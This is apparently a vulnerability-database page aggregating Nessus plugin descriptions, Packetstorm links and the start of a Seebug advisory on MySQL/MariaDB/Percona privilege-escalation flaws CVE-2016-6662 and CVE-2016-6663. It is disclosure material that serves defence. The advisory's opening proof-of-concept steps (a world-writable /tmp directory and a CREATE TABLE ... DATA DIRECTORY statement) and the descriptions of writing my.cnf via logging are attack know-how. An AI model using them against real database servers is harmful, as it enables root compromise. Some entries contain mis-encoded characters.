can exploit this issue by using specially crafted queries that utilize logging functionality to create new files or append custom content to existing files. This allows the attacker to gain root privileges by inserting a custom .cnf file with a last seen 2020-06-01 modified 2020-06-02 plugin id 93379 published 2016-09-08 reporter This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/93379 title MySQL 5.7.x < 5.7.15 Multiple Vulnerabilities NASL family Slackware Local Security Checks NASL id SLACKWARE_SSA_2016-305-03.NASL description New mariadb packages are available for Slackware 14.1, 14.2, and -current to fix security issues. last seen 2020-06-01 modified 2020-06-02 plugin id 94440 published 2016-11-01 reporter This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/94440 title Slackware 14.1 / 14.2 / current : mariadb (SSA:2016-305-03) NASL family F5 Networks Local Security Checks NASL id F5_BIGIP_SOL73828041.NASL description Race condition in Oracle MySQL before 5.5.52, 5.6.x before 5.6.33, 5.7.x before 5.7.15, and 8.x before 8.0.1; MariaDB before 5.5.52, 10.0.x before 10.0.28, and 10.1.x before 10.1.18; Percona Server before 5.5.51-38.2, 5.6.x before 5.6.32-78-1, and 5.7.x before 5.7.14-8; and Percona XtraDB Cluster before 5.5.41-37.0, 5.6.x before 5.6.32-25.17, and 5.7.x before 5.7.14-26.17 allows local users with certain permissions to gain privileges by leveraging use of my_copystat by REPAIR TABLE to repair a MyISAM table. (CVE-2016-6663) last seen 2020-06-01 modified 2020-06-02 plugin id 112023 published 2018-08-21 reporter This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/112023 title F5 Networks BIG-IP : MySQL vulnerability (K73828041) NASL family Databases NASL id MYSQL_5_5_52_RPM.NASL description The version of MySQL running on the remote host is 5.5.x prior to 5.5.52. It is, therefore, affected by multiple vulnerabilities : - An unspecified flaw exists in the DML subcomponent that allows an authenticated, remote attacker to cause a denial of service condition. (CVE-2016-5624) - A flaw exists in the check_log_path() function within file sql/sys_vars.cc due to inadequate restrictions on the ability to write to the my.cnf configuration file and allowing the loading of configuration files from path locations not used by current versions. An authenticated, remote attacker can exploit this issue by using specially crafted queries that utilize logging functionality to create new files or append custom content to existing files. This allows the attacker to gain root privileges by inserting a custom .cnf file with a last seen 2020-06-04 modified 2016-09-08 plugin id 93376 published 2016-09-08 reporter This script is Copyright (C) 2016-2020 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/93376 title MySQL 5.5.x < 5.5.52 Multiple Vulnerabilities NASL family Amazon Linux Local Security Checks NASL id ALA_ALAS-2017-800.NASL description It was discovered that the MySQL logging functionality allowed writing to MySQL configuration files. An administrative database user, or a database user with FILE privileges, could possibly use this flaw to run arbitrary commands with root privileges on the system running the database server. (CVE-2016-6662) A race condition was found in the way MySQL performed MyISAM engine table repair. A database user with shell access to the server running mysqld could use this flaw to change permissions of arbitrary files writable by the mysql system user. (CVE-2016-5616 , CVE-2016-6663) last seen 2020-06-01 modified 2020-06-02 plugin id 97329 published 2017-02-23 reporter This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/97329 title Amazon Linux AMI : mysql51 (ALAS-2017-800) NASL family Debian Local Security Checks NASL id DEBIAN_DSA-3711.NASL description Several issues have been discovered in the MariaDB database server. The vulnerabilities are addressed by upgrading MariaDB to the new upstream version 10.0.28. Please see the MariaDB 10.0 Release Notes for further details : - https://mariadb.com/kb/en/mariadb/mariadb-10028-release- notes/ last seen 2020-06-01 modified 2020-06-02 plugin id 94743 published 2016-11-14 reporter This script is Copyright (C) 2016-2018 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/94743 title Debian DSA-3711-1 : mariadb-10.0 - security update NASL family Huawei Local Security Checks NASL id EULEROS_SA-2016-1062.NASL description According to the versions of the mariadb packages installed, the EulerOS installation on the remote host is affected by the following vulnerabilities : - Unspecified vulnerability in Oracle MySQL 5.5.51 and earlier, 5.6.32 and earlier, and 5.7.14 and earlier allows remote authenticated users to affect availability via vectors related to Server: Optimizer.(CVE-2016-3492) - Unspecified vulnerability in Oracle MySQL 5.5.50 and earlier, 5.6.31 and earlier, and 5.7.13 and earlier allows remote authenticated users to affect availability via vectors related to DML.(CVE-2016-5612) - Unspecified vulnerability in Oracle MySQL 5.5.51 and earlier, 5.6.32 and earlier, and 5.7.14 and earlier allows local users to affect confidentiality, integrity, and availability via vectors related to Server: MyISAM.(CVE-2016-5616i1/4%0 - Unspecified vulnerability in Oracle MySQL 5.5.51 and earlier allows remote authenticated users to affect availability via vectors related to DML.i1/4^CVE-2016-5624i1/4%0 - Unspecified vulnerability in Oracle MySQL 5.5.51 and earlier, 5.6.32 and earlier, and 5.7.14 and earlier allows remote authenticated users to affect availability via vectors related to GIS.i1/4^CVE-2016-5626i1/4%0 - Unspecified vulnerability in Oracle MySQL 5.5.51 and earlier, 5.6.32 and earlier, and 5.7.14 and earlier allows remote administrators to affect availability via vectors related to Server: Federated.i1/4^CVE-2016-5629i1/4%0 - Oracle MySQL through 5.5.52, 5.6.x through 5.6.33, and 5.7.x through 5.7.15 MariaDB before 5.5.51, 10.0.x before 10.0.27, and 10.1.x before 10.1.17 and Percona Server before 5.5.51-38.1, 5.6.x before 5.6.32-78.0, and 5.7.x before 5.7.14-7 allow local users to create arbitrary configurations and bypass certain protection mechanisms by setting general_log_file to a my.cnf configuration. NOTE: this can be leveraged to execute arbitrary code with root privileges by setting malloc_lib.i1/4^CVE-2016-6662i1/4%0 - A race condition was found in the way MySQL performed MyISAM engine table repair. A database user with shell access to the server running mysqld could use this flaw to change permissions of arbitrary files writable by the mysql system user.i1/4^CVE-2016-6663i1/4%0 - Unspecified vulnerability in Oracle MySQL 5.5.51 and earlier, 5.6.32 and earlier, and 5.7.14 and earlier allows remote authenticated users to affect availability via vectors related to Server: Types.i1/4^CVE-2016-8283i1/4%0 Note that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues. last seen 2020-05-06 modified 2017-05-01 plugin id 99824 published 2017-05-01 reporter This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/99824 title EulerOS 2.0 SP1 : mariadb (EulerOS-SA-2016-1062) NASL family Databases NASL id MARIADB_5_5_52.NASL description The version of MariaDB running on the remote host is 5.5.x prior to 5.5.52. It is, therefore, affected by multiple vulnerabilities : - An unspecified flaw exists in the Optimizer subcomponent that allows an authenticated, remote attacker to cause a denial of service condition. (CVE-2016-3492) - An unspecified flaw exists in the MyISAM subcomponent that allows a local attacker to gain elevated privileges. (CVE-2016-5616) - An unspecified flaw exists in the DML subcomponent that allows an authenticated, remote attacker to cause a denial of service condition. (CVE-2016-5624) - An unspecified flaw exists in the GIS subcomponent that allows an authenticated, remote attacker to cause a denial of service condition. (CVE-2016-5626) - An unspecified flaw exists in the Federated subcomponent that allows an authenticated remote attacker to cause a denial of service condition. (CVE-2016-5629) - A security bypass vulnerability exists that allows an authenticated, remote attacker to bypass file access restrictions and create the /var/lib/mysql/my.cnf file with arbitrary contents without the FILE privilege requirement. (CVE-2016-6663) - An unspecified flaw exists in the Types subcomponent that allows an authenticated, remote attacker to cause a denial of service condition. (CVE-2016-8283) - A flaw exists in the Item_field::fix_after_pullout() function within file sql/item.cc when handling a prepared statement with conversion to semi-join. An authenticated, remote attacker can exploit this to cause a denial of service condition. - An assertion flaw exists in the mysql_admin_table() function within file sql/sql_admin.cc when handling the re-execution of certain ANALYZE TABLE prepared statements. An authenticated, remote attacker can exploit this to cause a denial of service condition. last seen 2020-06-01 modified 2020-06-02 plugin id 95633 published 2016-12-08 reporter This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/95633 title MariaDB 5.5.x < 5.5.52 Multiple Vulnerabilities NASL family Databases NASL id MYSQL_5_5_52.NASL description The version of MySQL running on the remote host is 5.5.x prior to 5.5.52. It is, therefore, affected by multiple vulnerabilities : - An unspecified flaw exists in the DML subcomponent that allows an authenticated, remote attacker to cause a denial of service condition. (CVE-2016-5624) - A flaw exists in the check_log_path() function within file sql/sys_vars.cc due to inadequate restrictions on the ability to write to the my.cnf configuration file and allowing the loading of configuration files from path locations not used by current versions. An authenticated, remote attacker can exploit this issue by using specially crafted queries that utilize logging functionality to create new files or append custom content to existing files. This allows the attacker to gain root privileges by inserting a custom .cnf file with a last seen 2020-06-01 modified 2020-06-02 plugin id 93375 published 2016-09-08 reporter This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/93375 title MySQL 5.5.x < 5.5.52 Multiple Vulnerabilities NASL family Oracle Linux Local Security Checks NASL id ORACLELINUX_ELSA-2016-2595.NASL description From Red Hat Security Advisory 2016:2595 : An update for mariadb is now available for Red Hat Enterprise Linux 7. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. MariaDB is a multi-user, multi-threaded SQL database server that is binary compatible with MySQL. The following packages have been upgraded to a newer upstream version: mariadb (5.5.52). (BZ#1304516, BZ#1377974) Security Fix(es) : * It was discovered that the MariaDB logging functionality allowed writing to MariaDB configuration files. An administrative database user, or a database user with FILE privileges, could possibly use this flaw to run arbitrary commands with root privileges on the system running the database server. (CVE-2016-6662) * A race condition was found in the way MariaDB performed MyISAM engine table repair. A database user with shell access to the server running mysqld could use this flaw to change permissions of arbitrary files writable by the mysql system user. (CVE-2016-6663) * This update fixes several vulnerabilities in the MariaDB database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section. (CVE-2016-3492, CVE-2016-5612, CVE-2016-5616, CVE-2016-5624, CVE-2016-5626, CVE-2016-5629, CVE-2016-8283) Additional Changes : For detailed information on changes in this release, see the Red Hat Enterprise Linux 7.3 Release Notes linked from the References section. last seen 2020-06-01 modified 2020-06-02 plugin id 94715 published 2016-11-11 reporter This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/94715 title Oracle Linux 7 : mariadb (ELSA-2016-2595) NASL family Databases NASL id MARIADB_10_1_18.NASL description The version of MariaDB running on the remote host is 10.1.x prior to 10.1.18. It is, therefore, affected by multiple vulnerabilities : - An unspecified flaw exists in the Optimizer subcomponent that allows an authenticated, remote attacker to cause a denial of service condition. (CVE-2016-3492) - An unspecified flaw exists in the MyISAM subcomponent that allows a local attacker to gain elevated privileges. (CVE-2016-5616) - An unspecified flaw exists in the DML subcomponent that allows an authenticated, remote attacker to cause a denial of service condition. (CVE-2016-5624) - An unspecified flaw exists in the GIS subcomponent that allows an authenticated, remote attacker to cause a denial of service condition. (CVE-2016-5626) - An unspecified flaw exists in the Federated subcomponent that allows an authenticated remote attacker to cause a denial of service condition. (CVE-2016-5629) - A security bypass vulnerability exists that allows an authenticated, remote attacker to bypass file access restrictions and create the /var/lib/mysql/my.cnf file with arbitrary contents without the FILE privilege requirement. (CVE-2016-6663) - An unspecified flaw exists in the Types subcomponent that allows an authenticated, remote attacker to cause a denial of service condition. (CVE-2016-8283) - A flaw exists in the Item_field::fix_after_pullout() function within file sql/item.cc when handling a prepared statement with conversion to semi-join. An authenticated, remote attacker can exploit this to cause a denial of service condition. - An assertion flaw exists in the mysql_admin_table() function within file sql/sql_admin.cc when handling the re-execution of certain ANALYZE TABLE prepared statements. An authenticated, remote attacker can exploit this to cause a denial of service condition. last seen 2020-06-01 modified 2020-06-02 plugin id 95632 published 2016-12-08 reporter This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/95632 title MariaDB 10.1.x < 10.1.18 Multiple Vulnerabilities NASL family FreeBSD Local Security Checks NASL id FREEBSD_PKG_22373C43D72811E6A9A5B499BAEBFEAF.NASL description The MySQL project reports : - CVE-2016-3492: Remote security vulnerability in last seen 2020-06-01 modified 2020-06-02 plugin id 96510 published 2017-01-16 reporter This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/96510 title FreeBSD : MySQL -- multiple vulnerabilities (22373c43-d728-11e6-a9a5-b499baebfeaf) NASL family SuSE Local Security Checks NASL id SUSE_SU-2016-2933-1.NASL description This mariadb update to version 10.0.28 fixes the following issues (bsc#1008318): Security fixes : - CVE-2016-8283: Unspecified vulnerability in subcomponent Types (bsc#1005582) - CVE-2016-7440: Unspecified vulnerability in subcomponent Encryption (bsc#1005581) - CVE-2016-5629: Unspecified vulnerability in subcomponent Federated (bsc#1005569) - CVE-2016-5626: Unspecified vulnerability in subcomponent GIS (bsc#1005566) - CVE-2016-5624: Unspecified vulnerability in subcomponent DML (bsc#1005564) - CVE-2016-5616: Unspecified vulnerability in subcomponent MyISAM (bsc#1005562) - CVE-2016-5584: Unspecified vulnerability in subcomponent Encryption (bsc#1005558) - CVE-2016-3492: Unspecified vulnerability in subcomponent Optimizer (bsc#1005555) - CVE-2016-6663: Privilege Escalation / Race Condition (bsc#1001367) Bugfixes : - mysql_install_db can last seen 2020-06-01 modified 2020-06-02 plugin id 95384 published 2016-11-29 reporter This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/95384 title SUSE SLED12 / SLES12 Security Update : Recommended update for mariadb (SUSE-SU-2016:2933-1) NASL family Scientific Linux Local Security Checks NASL id SL_20170124_MYSQL_ON_SL6_X.NASL description Security Fix(es) : - It was discovered that the MySQL logging functionality allowed writing to MySQL configuration files. An administrative database user, or a database user with FILE privileges, could possibly use this flaw to run arbitrary commands with root privileges on the system running the database server. (CVE-2016-6662) - A race condition was found in the way MySQL performed MyISAM engine table repair. A database user with shell access to the server running mysqld could use this flaw to change permissions of arbitrary files writable by the mysql system user. (CVE-2016-6663, CVE-2016-5616) last seen 2020-03-18 modified 2017-01-25 plugin id 96758 published 2017-01-25 reporter This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/96758 title Scientific Linux Security Update : mysql on SL6.x i386/x86_64 (20170124) NASL family Virtuozzo Local Security Checks NASL id VIRTUOZZO_VZLSA-2017-0184.NASL description An update for mysql is now available for Red Hat Enterprise Linux 6. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. MySQL is a multi-user, multi-threaded SQL database server. It consists of the MySQL server daemon (mysqld) and many client programs and libraries. Security Fix(es) : * It was discovered that the MySQL logging functionality allowed writing to MySQL configuration files. An administrative database user, or a database user with FILE privileges, could possibly use this flaw to run arbitrary commands with root privileges on the system running the database server. (CVE-2016-6662) * A race condition was found in the way MySQL performed MyISAM engine table repair. A database user with shell access to the server running mysqld could use this flaw to change permissions of arbitrary files writable by the mysql system user. (CVE-2016-6663, CVE-2016-5616) Note that Tenable Network Security has attempted to extract the preceding description block directly from the corresponding Red Hat security advisory. Virtuozzo provides no description for VZLSA advisories. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues. last seen 2020-06-01 modified 2020-06-02 plugin id 101415 published 2017-07-13 reporter This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/101415 title Virtuozzo 6 : mysql / mysql-bench / mysql-devel / mysql-embedded / etc (VZLSA-2017-0184) NASL family CentOS Local Security Checks NASL id CENTOS_RHSA-2017-0184.NASL description An update for mysql is now available for Red Hat Enterprise Linux 6. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. MySQL is a multi-user, multi-threaded SQL database server. It consists of the MySQL server daemon (mysqld) and many client programs and libraries. Security Fix(es) : * It was discovered that the MySQL logging functionality allowed writing to MySQL configuration files. An administrative database user, or a database user with FILE privileges, could possibly use this flaw to run arbitrary commands with root privileges on the system running the database server. (CVE-2016-6662) * A race condition was found in the way MySQL performed MyISAM engine table repair. A database user with shell access to the server running mysqld could use this flaw to change permissions of arbitrary files writable by the mysql system user. (CVE-2016-6663, CVE-2016-5616) last seen 2020-06-01 modified 2020-06-02 plugin id 96812 published 2017-01-27 reporter This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/96812 title CentOS 6 : mysql (CESA-2017:0184) NASL family Oracle Linux Local Security Checks NASL id ORACLELINUX_ELSA-2017-0184.NASL description From Red Hat Security Advisory 2017:0184 : An update for mysql is now available for Red Hat Enterprise Linux 6. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. MySQL is a multi-user, multi-threaded SQL database server. It consists of the MySQL server daemon (mysqld) and many client programs and libraries. Security Fix(es) : * It was discovered that the MySQL logging functionality allowed writing to MySQL configuration files. An administrative database user, or a database user with FILE privileges, could possibly use this flaw to run arbitrary commands with root privileges on the system running the database server. (CVE-2016-6662) * A race condition was found in the way MySQL performed MyISAM engine table repair. A database user with shell access to the server running mysqld could use this flaw to change permissions of arbitrary files writable by the mysql system user. (CVE-2016-6663, CVE-2016-5616) last seen 2020-06-01 modified 2020-06-02 plugin id 96753 published 2017-01-25 reporter This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/96753 title Oracle Linux 6 : mysql (ELSA-2017-0184) NASL family SuSE Local Security Checks NASL id OPENSUSE-2016-1417.NASL description This mariadb update to version 10.0.28 fixes the following issues (bsc#1008318) : Security fixes : - CVE-2016-8283: Unspecified vulnerability in subcomponent Types (bsc#1005582) - CVE-2016-7440: Unspecified vulnerability in subcomponent Encryption (bsc#1005581) - CVE-2016-5629: Unspecified vulnerability in subcomponent Federated (bsc#1005569) - CVE-2016-5626: Unspecified vulnerability in subcomponent GIS (bsc#1005566) - CVE-2016-5624: Unspecified vulnerability in subcomponent DML (bsc#1005564) - CVE-2016-5616: Unspecified vulnerability in subcomponent MyISAM (bsc#1005562) - CVE-2016-5584: Unspecified vulnerability in subcomponent Encryption (bsc#1005558) - CVE-2016-3492: Unspecified vulnerability in subcomponent Optimizer (bsc#1005555) - CVE-2016-6663: Privilege Escalation / Race Condition (bsc#1001367) Bugfixes : - mysql_install_db can last seen 2020-06-05 modified 2016-12-07 plugin id 95597 published 2016-12-07 reporter This script is Copyright (C) 2016-2020 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/95597 title openSUSE Security Update : mariadb (openSUSE-2016-1417) NASL family Huawei Local Security Checks NASL id EULEROS_SA-2019-1553.NASL description According to the versions of the mariadb packages installed, the EulerOS Virtualization installation on the remote host is affected by the following vulnerabilities : - Unspecified vulnerability in Oracle MySQL 5.5.49 and earlier, 5.6.30 and earlier, and 5.7.12 and earlier and MariaDB before 5.5.50, 10.0.x before 10.0.26, and 10.1.x before 10.1.15 allows local users to affect confidentiality, integrity, and availability via vectors related to Server: Parser.(CVE-2016-3477) - Unspecified vulnerability in Oracle MySQL 5.5.51 and earlier, 5.6.32 and earlier, and 5.7.14 and earlier allows remote authenticated users to affect availability via vectors related to Server: Optimizer.(CVE-2016-3492) - Unspecified vulnerability in Oracle MySQL 5.5.51 and earlier, 5.6.32 and earlier, and 5.7.14 and earlier allows remote administrators to affect availability via vectors related to Server: Federated.(CVE-2016-5629) - Unspecified vulnerability in Oracle MySQL 5.5.47 and earlier, 5.6.28 and earlier, and 5.7.10 and earlier and MariaDB before 5.5.48, 10.0.x before 10.0.24, and 10.1.x before 10.1.12 allows local users to affect availability via vectors related to Replication.(CVE-2016-0650) - Unspecified vulnerability in Oracle MySQL 5.5.49 and earlier, 5.6.30 and earlier, and 5.7.12 and earlier and MariaDB before 5.5.50, 10.0.x before 10.0.26, and 10.1.x before 10.1.15 allows remote administrators to affect availability via vectors related to Server: RBR.(CVE-2016-5440) - Unspecified vulnerability in Oracle MySQL 5.5.49 and earlier, 5.6.30 and earlier, and 5.7.12 and earlier and MariaDB before 5.5.50, 10.0.x before 10.0.26, and 10.1.x before 10.1.15 allows remote authenticated users to affect availability via vectors related to Server: Types.(CVE-2016-3521) - Unspecified vulnerability in Oracle MySQL 5.5.46 and earlier, 5.6.27 and earlier, and 5.7.9 and MariaDB before 5.5.47, 10.0.x before 10.0.23, and 10.1.x before 10.1.10 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Client. NOTE: the previous information is from the January 2016 CPU. Oracle has not commented on third-party claims that these are multiple buffer overflows in the mysqlshow tool that allow remote database servers to have unspecified impact via a long table or database name.(CVE-2016-0546) - Unspecified vulnerability in Oracle MySQL 5.5.46 and earlier, 5.6.27 and earlier, and 5.7.9 and MariaDB before 5.5.47, 10.0.x before 10.0.23, and 10.1.x before 10.1.10 allows remote authenticated users to affect availability via vectors related to DML.(CVE-2016-0598) - Unspecified vulnerability in Oracle MySQL 5.5.48 and earlier, 5.6.29 and earlier, and 5.7.11 and earlier and MariaDB before 5.5.49, 10.0.x before 10.0.25, and 10.1.x before 10.1.14 allows remote attackers to affect confidentiality via vectors related to Server: Connection.(CVE-2016-5444) - Unspecified vulnerability in Oracle MySQL 5.5.49 and earlier, 5.6.30 and earlier, and 5.7.12 and earlier and MariaDB before 5.5.50, 10.0.x before 10.0.26, and 10.1.x before 10.1.15 allows remote authenticated users to affect availability via vectors related to Server: DML.(CVE-2016-3615) - A race condition was found in the way MySQL performed MyISAM engine table repair. A database user with shell access to the server running mysqld could use this flaw to change permissions of arbitrary files writable by the mysql system user.(CVE-2016-6663) - It was discovered that the MySQL logging functionality allowed writing to MySQL configuration files. An administrative database user, or a database user with FILE privileges, could possibly use this flaw to run arbitrary commands with root privileges on the system running the database server.(CVE-2016-6662) - Unspecified vulnerability in Oracle MySQL 5.5.46 and earlier, 5.6.27 and earlier, and 5.7.9 and MariaDB before 5.5.47, 10.0.x before 10.0.23, and 10.1.x before 10.1.10 allows remote authenticated users to affect availability via unknown vectors related to Options.(CVE-2016-0505) - Unspecified vulnerability in Oracle MySQL 5.5.48 and earlier, 5.6.29 and earlier, and 5.7.11 and earlier and MariaDB before 5.5.49, 10.0.x before 10.0.25, and 10.1.x before 10.1.14 allows local users to affect availability via vectors related to Security: Privileges.(CVE-2016-0666) - Unspecified vulnerability in Oracle MySQL Server 5.5.39 and earlier and 5.6.20 and earlier allows remote authenticated users to affect availability via vectors related to SERVER:OPTIMIZER.(CVE-2014-6469) - Unspecified vulnerability in Oracle MySQL 5.5.47 and earlier, 5.6.28 and earlier, and 5.7.10 and earlier and MariaDB before 5.5.48, 10.0.x before 10.0.24, and 10.1.x before 10.1.12 allows local users to affect integrity and availability via vectors related to DML.(CVE-2016-0640) - Unspecified vulnerability in Oracle MySQL 5.5.48 and earlier, 5.6.29 and earlier, and 5.7.10 and earlier and MariaDB before 5.5.49, 10.0.x before 10.0.25, and 10.1.x before 10.1.14 allows remote attackers to affect confidentiality via vectors related to Server: Security: Encryption.(CVE-2016-3452) - Unspecified vulnerability in Oracle MySQL 5.5.47 and earlier, 5.6.28 and earlier, and 5.7.10 and earlier and MariaDB before 5.5.48, 10.0.x before 10.0.24, and 10.1.x before 10.1.12 allows local users to affect confidentiality and availability via vectors related to MyISAM.(CVE-2016-0641) - Unspecified vulnerability in Oracle MySQL Server 5.5.39 and earlier and 5.6.20 and earlier allows remote authenticated users to affect availability via vectors related to SERVER:INNODB DML FOREIGN KEYS.(CVE-2014-6464) - Unspecified vulnerability in Oracle MySQL Server 5.5.39 and earlier, and 5.6.20 and earlier, allows remote attackers to affect confidentiality via vectors related to C API SSL CERTIFICATE HANDLING.(CVE-2014-6559) Note that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues. last seen 2020-06-01 modified 2020-06-02 plugin id 125006 published 2019-05-14 reporter This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/125006 title EulerOS Virtualization 3.0.1.0 : mariadb (EulerOS-SA-2019-1553) NASL family SuSE Local Security Checks NASL id OPENSUSE-2016-1416.NASL description This mariadb update to version 10.0.28 fixes the following issues (bsc#1008318) : Security fixes : - CVE-2016-8283: Unspecified vulnerability in subcomponent Types (bsc#1005582) - CVE-2016-7440: Unspecified vulnerability in subcomponent Encryption (bsc#1005581) - CVE-2016-5629: Unspecified vulnerability in subcomponent Federated (bsc#1005569) - CVE-2016-5626: Unspecified vulnerability in subcomponent GIS (bsc#1005566) - CVE-2016-5624: Unspecified vulnerability in subcomponent DML (bsc#1005564) - CVE-2016-5616: Unspecified vulnerability in subcomponent MyISAM (bsc#1005562) - CVE-2016-5584: Unspecified vulnerability in subcomponent Encryption (bsc#1005558) - CVE-2016-3492: Unspecified vulnerability in subcomponent Optimizer (bsc#1005555) - CVE-2016-6663: Privilege Escalation / Race Condition (bsc#1001367) Bugfixes : - mariadb failing test sys_vars.optimizer_switch_basic (bsc#1003800) - Remove useless [email protected] (bsc#1004477) - Replace all occurrences of the string last seen 2020-06-05 modified 2016-12-07 plugin id 95596 published 2016-12-07 reporter This script is Copyright (C) 2016-2020 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/95596 title openSUSE Security Update : mariadb (openSUSE-2016-1416)
Packetstorm
data source https://packetstormsecurity.com/files/download/139491/mysql-chowned.txt id PACKETSTORM:139491 last seen 2016-12-05 published 2016-11-02 reporter Dawid Golunski source https://packetstormsecurity.com/files/139491/MySQL-MariaDB-PerconaDB-Root-Privilege-Escalation.html title MySQL / MariaDB / PerconaDB Root Privilege Escalation data source https://packetstormsecurity.com/files/download/138678/mysql-rootprivesc.txt id PACKETSTORM:138678 last seen 2016-12-05 published 2016-09-12 reporter Dawid Golunski source https://packetstormsecurity.com/files/138678/MySQL-5.7.15-5.6.33-5.5.52-Remote-Code-Execution.html title MySQL 5.7.15 / 5.6.33 / 5.5.52 Remote Code Execution data source https://packetstormsecurity.com/files/download/139476/db-escalate.txt id PACKETSTORM:139476 last seen 2016-12-05 published 2016-11-02 reporter Dawid Golunski source https://packetstormsecurity.com/files/139476/MySQL-MariaDB-PerconaDB-Privilege-Escalation-Race-Condition.html title MySQL / MariaDB / PerconaDB Privilege Escalation / Race Condition
Redhat
advisories |
| ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
rpms |
|
Seebug
bulletinFamily exploit description - Release date: 01.11.2016 - Discovered by: Dawid Golunski I. VULNERABILITY ------------------------- MySQL / MariaDB / PerconaDB - Privilege Escalation / Race Condition MariaDB < 5.5.52 < 10.1.18 < 10.0.28 MySQL <= 5.5.51 <= 5.6.32 <= 5.7.14 Percona Server < 5.5.51-38.2 < 5.6.32-78-1 < 5.7.14-8 Percona XtraDB Cluster < 5.6.32-25.17 < 5.7.14-26.17 < 5.5.41-37.0 II. BACKGROUND ------------------------- MySQL: "MySQL is the world's most popular open source database. Whether you are a fast growing web property, technology ISV or large enterprise, MySQL can cost-effectively help you deliver high performance, scalable database applications." "Many of the world's largest and fastest-growing organizations including Facebook, Google, Adobe, Alcatel Lucent and Zappos rely on MySQL to save time and money powering their high-volume Web sites, business-critical systems and packaged software." http://www.mysql.com/products/ http://www.mysql.com/why-mysql/ -- MariaDB: "MariaDB is one of the most popular database servers in the world. It’s made by the original developers of MySQL and guaranteed to stay open source. Notable users include Wikipedia, WordPress.com and Google. MariaDB turns data into structured information in a wide array of applications, ranging from banking to websites. It is an enhanced, drop-in replacement for MySQL. MariaDB is used because it is fast, scalable and robust, with a rich ecosystem of storage engines, plugins and many other tools make it very versatile for a wide variety of use cases." https://mariadb.org/about/ -- PerconaDB: "Percona Server for MySQL® is a free, fully compatible, enhanced, open source drop-in replacement for MySQL that provides superior performance, scalability and instrumentation. With over 3,000,000 downloads, Percona Server’s self-tuning algorithms and support for extremely high-performance hardware delivers excellent performance and reliability." https://www.percona.com/software/mysql-database/percona-server III. INTRODUCTION ------------------------- An independent research has revealed a race condition vulnerability which is present in MySQl, MariaDB and PerconaDB databases. The vulnerability can allow a local system user with access to the affected database in the context of a low-privileged account (CREATE/INSERT/SELECT grants) to escalate their privileges and execute arbitrary code as the database system user (typically 'mysql'). Successful exploitation would allow an attacker to gain access to all of the databases stored on the affected database server. The obtained level of access upon the exploitation, could be chained with the other privilege escalation vulnerabilities discovered by the author of this advisory (CVE-2016-6662 and CVE-2016-6664) to further escalate privileges from mysql user to root user and thus allow attackers to fully compromise the target server. IV. DESCRIPTION ------------------------- Table locations ~~~~~~~~~~~~~~~~~~ MySQL-based databases allow users with CREATE table privilege to optionally specify a disk path of the directory where the table will be stored via a DATA DIRECTORY parameter in the CREATE statement. Users who have access to a database account with CREATE grant could create a table under a directory that they can control. For example: attacker@debian:~$ mkdir /tmp/disktable attacker@debian:~$ chmod 777 /tmp/disktable/ attacker@debian:~$ ls -ld /tmp/disktable/ drwxrwxrwx 2 attacker attacker 4096 Oct 28 10:53 /tmp/disktable/ A user could then place a table within the directory with the following SQL statement: mysql> CREATE TABLE poctab1 (txt varchar(50)) engine = 'MyISAM' data directory '/tmp/disktable'; which would result in creating the following table file: attacker@debian:~$ ls -l /tmp/disktable/ total 0 -rw-rw---- 1 mysql mysql 0 